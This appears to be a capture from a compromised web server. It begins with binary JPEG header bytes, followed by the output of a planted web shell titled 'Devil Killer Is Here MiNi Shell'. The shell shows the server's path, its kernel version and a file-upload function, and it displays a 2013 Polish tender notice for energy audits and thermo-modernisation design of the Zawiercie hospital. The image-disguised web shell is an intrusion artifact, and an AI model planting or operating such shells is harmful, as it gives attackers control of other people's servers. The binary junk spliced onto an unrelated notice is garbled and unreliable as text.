JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130424/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130424/163240-N-2013.html

<p class="kh_header"><b>Zawiercie: Wykonanie audytów energetycznych i dokumentacji projektowo - kosztorysowej termomodernizacji budynków Szpitala Powiatowego w Zawierciu oraz pełnienie nadzoru autorskiego</b><br>
<b>Numer ogłoszenia: 163240 - 2013; data zamieszczenia: 24.04.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Zawierciański Starostwo Powiatowe , ul. Sienkiewicza 34, 42-400 Zawiercie, woj. śląskie, tel. 32 6710710-2 w. 551, faks 32 6721971.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zawiercie.powiat.pl</li><li><b>Adres strony internetowej, pod którym dostępne są informacje dotyczące dynamicznego systemu zakupów:</b> nie dotyczy</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie audytów energetycznych i dokumentacji projektowo - kosztorysowej termomodernizacji budynków Szpitala Powiatowego w Zawierciu oraz pełnienie nadzoru autorskiego.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zakres zamówienia obejmuje kompleksowe wykonanie dokumentacji projektowej termomodernizacji Szpitala Powiatowego w Zawierciu, stanowiącej podstawę do ubiegania się o dofinansowanie realizacji projektu ze środków Funduszy Norweskich lub innych programów ze środków Unii Europejskiej.
Przedmiotem zamówienia jest opracowanie audytów energetycznych, kompleksowej dokumentacji projektowej budowlano - wykonawczej i kosztorysowej oraz pełnienie nadzoru autorskiego w przypadku realizacji inwestycji polegającej na termomodernizacji Szpitala Powiatowego w Zawierciu, w szczególności:
1. Wykonanie audytów energetycznych i dokumentacji projektowej  termomodernizacji budynków Szpitala Powiatowego w Zawierciu, obejmującej niżej wymieniony zakres:
1) Ocieplenie ścian zewnętrznych budynku i stropodachu, izolacja fundamentów,
2) Wymiana stolarki okiennej,
3) Wymiana drzwi zewnętrznych,
4)Modernizacja instalacji c.o. z wymianą grzejników i montażem zaworów      termostatycznych,
5) Montaż kolektorów słonecznych,
6) Modernizacja oświetlenia - wymiana na energooszczędne,
7) Monitoring p/poż., instalacja odgromowa i pozostałe zalecenia PSP wymienione w punkcie 13.
8) Modernizacja wentylacji,
9) Montaż windy zewnętrznej,
10) Dobudowa ciągu komunikacyjnego brudnego sal operacyjnych Bloku Operacyjnego umieszczona na zewnątrz budynku na lekkiej konstrukcji stalowej,
11) Inwentaryzacja budynku do celów projektowych,
12) Inne prace, których konieczność wykonania będzie wynikać z audytu energetycznego.
2. Charakterystyka budynków Szpitala podana poniżej zawiera orientacyjne dane i nie  stanowi podstawy dla sporządzenia audytów i dokumentacji, stanowiących przedmiot zamówienia.

Budynek Główny Szpitala ( składa się z 3 pawilonów A,B,C w kształcie litery H ).
Rok budowy 1960
Liczba kondygnacji 4 + piwnice
Kubatura części ogrzewanej - 35 960,26 m3
Powierzchnia netto budynku - 3 380 m2
Powierzchnia użytkowa - 11 271,02 m2

Budynek Pawilon D tzw. Pawilon Zakaźny
Rok budowy 1960
Liczba kondygnacji: 3 + piwnice
Kubatura części ogrzewanej - 6 164,28 m3
Powierzchnia netto budynku - 950,25 m2
Powierzchnia użytkowa - 1 896,70 m2

3. Zakres przedmiotu zamówienia obejmuje między innymi:
- audyty energetyczne oddzielnie dla każdego budynku plus audyt zbiorczy,
- projekty budowlane i wykonawcze oddzielnie dla każdego budynku oraz windy i ciągu komunikacyjnego i każdej  branży,
- kosztorysy inwestorskie oddzielnie dla każdego zakresu  i każdej branży, 
- przedmiary robót, 
- specyfikacje techniczne wykonania i odbioru robót budowlanych oddzielnie dla     
  każdego zakresu i  każdej  branży, 
- informacje dotyczące bezpieczeństwa i ochrony zdrowia ze względu na specyfikę 
  projektów, w przypadku gdy jej opracowanie jest wymagane na podstawie odrębnych    
  przepisów oraz inne  dokumenty niezbędne do realizacji inwestycji.
4. Przedmiot zamówienia  obejmuje również wykonanie inwentaryzacji budowlanych dla potrzeb projektu, dokonanie oceny stanu technicznego i obliczeń wytrzymałościowych elementów konstrukcyjnych dla potrzeb sporządzanych dokumentacji, szczególnie dla  dachów (stropodachów) w związku z ich dociepleniem itp., uzyskanie map dla celów projektowych, wypisy, wyrysy, uzgodnienia, decyzje, ekspertyzy, oceny, opinie, badania i inne dokumenty niezbędne dla prawidłowego wykonania przedmiotu umowy, jak również uzyskanie na rzecz Zamawiającego wszelkich niezbędnych decyzji i pozwoleń w tym pozwolenia na budowę, umożliwiających realizację inwestycji.
5. Przedmiot zamówienia obejmuje jak również pełnienie nadzorów autorskich podczas realizacji zadań, objętych przedmiotem zamówienia oraz współpracę z Zamawiającym przy opracowaniu dokumentów dla instytucji finansujących  oraz pośredniczenie w negocjacjach z instytucjami współfinansującymi termomodernizację w zakresie dotyczącym dokumentacji, będącej przedmiotem zamówienia. 
W zakresie nadzoru autorskiego przedmiot zamówienia obejmuje wykonywanie czynności nadzoru autorskiego z częstotliwością uzależnioną od postępu robót oraz na wezwanie Zamawiającego, w tym również uczestnictwo w pracach dotyczących procedury przetargowej dotyczącej wyboru wykonawcy robót budowlanych, tj. udział w spotkaniach związanych z opracowaniem dokumentacji przetargowej, udzielanie wyjaśnień i odpowiedzi na ewentualne zapytania od oferentów w postępowaniu przetargowym na wykonanie robót budowlanych na podstawie opracowanej dokumentacji. 
W przypadku ujawnienia wad i błędów projektu po dokonanym przez Zamawiającego odbiorze projektu oraz braku możliwości realizacji inwestycji zgodnie z projektem w trakcie wykonywania robót na jego podstawie, Wykonawca zobowiązany jest dokonać poprawek i uzupełnić projekt nieodpłatnie w terminie wyznaczonym przez Zamawiającego.
6. Dokumentację stanowiącą przedmiot zamówienia należy dostarczyć w wersji papierowej i w wersji elektronicznej z zapisem na CD/DVD w formacie ogólnodostępnym pdf. Wyjątek stanowią kosztorysy.
7. Audyty i dokumentację projektową należy dostarczyć w niżej wymienionych ilościach egzemplarzach w wersji papierowej i 2 egzemplarzach w wersji elektronicznej na płycie CD/DVD.
8. W skład kompletnej dokumentacji (dla każdego z budynków) wchodzą następujące elementy:
 a) audyt energetyczny oddzielnie dla każdego budynku plus audyt zbiorczy,- w ilości 3 kompletnych egzemplarzy w formie papierowego oryginału - wykonany przez osoby posiadające odpowiednie uprawnienia zawodowe zgodnie ze wszystkimi obowiązującymi przepisami, w tym przepisami prawa Wspólnoty Europejskiej. Audyty winny być wykonane zgodnie z Rozporządzeniem Ministra Infrastruktury z dnia 17 marca 2009 r. w sprawie szczegółowego zakresu i form audytu energetycznego oraz części audytu remontowego, wzorów kart audytów a także algorytmu oceny opłacalności przedsięwzięcia termomodernizacyjnego.
b) projekt budowlany - w ilości 5 kompletnych egzemplarzy w formie papierowego oryginału - wykonany zgodnie z wymaganiami aktualnej ustawy z dnia 7 lipca 1994 r. Prawo budowlane (Dz. U. z 2010 r. Nr 243, poz. 1623 z późn. zm.),   oraz Rozporządzeniem Ministra Infrastruktury z dnia 3 lipca 2003 r. w sprawie szczegółowego zakresu i formy projektu budowlanego,
c) projekt wykonawczy - w ilości 5 kompletnych egzemplarzy w formie papierowego oryginału - wykonany zgodnie z wymaganiami Rozporządzenia Ministra Infrastruktury dnia 2 września 2004 roku w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (D.U. z dnia 16 września 2004 roku Nr 202, poz. 2072 ze  zm.)  oraz Rozporządzeniem Ministra Infrastruktury z dnia 12 kwietnia 2002r. w sprawie warunków technicznych, jakim powinny odpowiadać budynki i ich usytuowanie (Dz. U. Nr 75, poz. 690 z późn. zm.), 
d)  kosztorys inwestorski - w ilości 2 kompletnych egzemplarzy w formie papierowego oryginału - wykonany zgodnie z wymaganiami aktualnego Rozporządzenia Ministra Infrastruktury z dnia 18 maja 2004 r. w sprawie określenia metod i podstaw sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno-użytkowym ( Dz. U. Nr 130, poz. 1389),
e)  przedmiar robót - w ilości 2 kompletnych egzemplarzy w formie papierowego oryginału wykonany zgodnie z wymaganiami aktualnego Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r.w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (D.U. z dnia 16 września 2004 roku Nr 202, poz. 2072 ze  zm.),
f) specyfikacja techniczna wykonania i odbioru robót budowlanych - w ilości 2 kompletnych egzemplarzy w formie papierowego oryginału  wykonana zgodnie z wymaganiami aktualnego Rozporządzenia Ministra Infrastruktury z dnia 2 września 2004 r.w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (D.U. z dnia 16 września 2004 roku Nr 202, poz. 2072 ze  zm.),
g) informacji dotyczącej bezpieczeństwa i ochrony zdrowia - w ilości  5 egzemplarzy w formie papierowego oryginału  wykonana zgodnie z  Rozporządzeniem Ministra Infrastruktury z dnia 23 czerwca 2003 r. w sprawie informacji dotyczącej bezpieczeństwa i ochrony zdrowia (Dz. U. z 2003r., nr 120, poz.1126 ),

Dokumentacja projektowa oraz audyt energetyczny powinny być zgodne również z innymi przepisami  regulującymi projektowanie i realizację inwestycji budowlanych, a także przepisami szczególnymi, polskimi normami wprowadzającymi normy europejskie lub europejskie aprobaty techniczne. 

9. Obowiązki projektanta na etapie opracowania dokumentacji projektowej:
Przed przystąpieniem do sporządzenia właściwego projektu, Projektant jest zobowiązany przedłożyć Zamawiającemu do zatwierdzenia  projekt wstępny i uzyskać jego akceptację;
1) Zamawiający oczekuje autorskich, nowatorskich i nowoczesnych rozwiązań architektonicznych, technologicznych i funkcjonalnych prowadzących do minimalizacji kosztów eksploatacji;
2) Projektant zobowiązany jest do zorganizowania minimum dwóch spotkań  roboczych z Zamawiającym na etapie sporządzenia dokumentacji projektowej w celu omówienia przyjętej koncepcji, rozwiązań projektowych i materiałowych, które muszą  zakończyć się spisaniem protokołu,  podpisanym przez strony.

10. Opracowana dokumentacja projektowa wraz z audytem energetycznym stanowić będzie podstawę do ubiegania się przez Zamawiającego o dofinansowanie realizacji zadania inwestycyjnego, polegającego na kompleksowej termomodernizacji Szpitala Powiatowego w Zawierciu. 
W ramach umowy Wykonawca zobowiązany będzie do aktualizacji kosztorysów inwestorskich zgodnie z wymaganiami ustawy Prawo Zamówień Publicznych.
Maksymalna ilość aktualizacji - co 6 m-cy do momentu ogłoszenia przetargu na wykonanie robót budowlanych..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 71.22.00.00-6, 71.24.80.00-8, 71.31.43.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w dniach: 90.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna, że warunek jest spełniony, jeżeli wykonawca złoży wraz z ofertą podpisany Załącznik Nr 2 do SIWZ, tj.: oświadczenie o spełnianiu warunków udziału w postępowaniu.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1.wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie ( w Załączniku nr 5 do SIWZ ) w szczególności:
a)poświadczenia, z tym że w odniesieniu do nadal wykonywanych usług okresowych lub ciągłych poświadczenie powinno być wydane nie wcześniej niż 3 miesiące przez upływem terminu składania ofert.
b) oświadczenie wykonawcy, jeżeli z uzasadnionych przyczyn o obiektywnym charakterze wykonawca nie jest w stanie uzyskać poświadczenia, o którym mowa powyżej w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia opisanego w pkt VI.2) SIWZ,tj. Wykonawca wykaże wykonanie co najmniej jednej (1) usługi polegającej na wykonaniu kompleksowej dokumentacji projektowej przebudowy, remontu obiektu użyteczności publicznej z elementami termomodernizacji  o kubaturze minimum 20 000 m3  i wartości minimum 150.000,00 zł brutto, (wg wzoru stanowiącego załącznik Nr 5 do SIWZ) wraz z dokumentem potwierdzającym, że usługa została wykonana należycie. Za kompleksową dokumentację projektową uznaje się dokumentację składającą się z:  projektu budowlanego i wykonawczego, kosztorysów i STOiWR.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie precyzuje w tym zakresie żadnych wymagań, których spełnianie Wykonawca zobowiązany jest wykazać w sposób szczególny. Zamawiający uzna, że warunek jest spełniony, jeżeli wykonawca złoży wraz z ofertą podpisany Załącznik Nr 2 do SIWZ, tj.: oświadczenie o spełnianiu warunków udziału w postępowaniu.
Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nich czynności oraz informacją o podstawie do dysponowania tymi osobami  (sporządzony według wzoru stanowiącego Załącznik Nr 4 do SIWZ), z uwzględnieniem spełnienia wymogów pkt. VI.3) SIWZ, tj. Wykonawca wykaże, że dysponuje lub będzie dysponował minimum jedną osobą, która będzie uczestniczyć w wykonywaniu zamówienia, posiadającą uprawnienia do projektowania bez ograniczeń w branży architektonicznej, konstrukcyjnej, sanitarnej, elektrycznej bez ograniczeń
2. oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia (również w Załączniku Nr 4 do SIWZ)</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Polisa lub inny dokument ubezpieczenia potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności na sumę nie mniejszą niż 150 000 zł.Ocena spełniania przedstawionych powyżej warunków zostanie dokonana wg formuły: spełnia - nie spełnia.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">określenie dostaw lub usług, których dotyczy obowiązek wskazania przez wykonawcę w wykazie lub złożenia poświadczeń, w tym informacja o dostawach lub usługach niewykonanych lub wykonanych nienależycie<br>Warunek ten zostanie uznany za spełniony, jeżeli Wykonawca wykaże wykonanie co najmniej jednej (1) usługi polegającej na wykonaniu kompleksowej dokumentacji projektowej przebudowy, remontu obiektu użyteczności publicznej z elementami termomodernizacji  o kubaturze minimum 20 000 m3  i wartości minimum 150.000,00 zł brutto, (wg wzoru stanowiącego załącznik Nr 5 do SIWZ) wraz z dokumentem potwierdzającym, że usługa została wykonana należycie. Za kompleksową dokumentację projektową uznaje się dokumentację składającą się z:  projektu budowlanego i wykonawczego, kosztorysów i STOiWR.;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)wypełniony formularz oferty (wg wzoru stanowiącego Załącznik Nr 1 do SIWZ )
2)kalkulacja ceny ofertowej - zgodnie z treścią załącznika nr 1 a
3)wykaz części zamówienia, które wykonawca zamierza powierzyć podwykonawcom, złożony na druku stanowiącym Załącznik Nr 6 do SIWZ (Wykonawca, który nie przewiduje udziału podwykonawców w realizacji zamówienia - nie składa tego dokumentu) 
4)pełnomocnictwo do podpisania oferty, o ile prawo do podpisania oferty nie wynika  z innych dokumentów złożonych wraz z ofertą - treść pełnomocnictwa musi jednoznacznie wskazywać czynności, do wykonywania których pełnomocnik jest powołany,
5)pełnomocnictwo do reprezentowania wszystkich wykonawców wspólnie ubiegających się o udzielenie zamówienia do reprezentowania wykonawców w postępowaniu lub do reprezentowania w postępowaniu i podpisania umowy</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
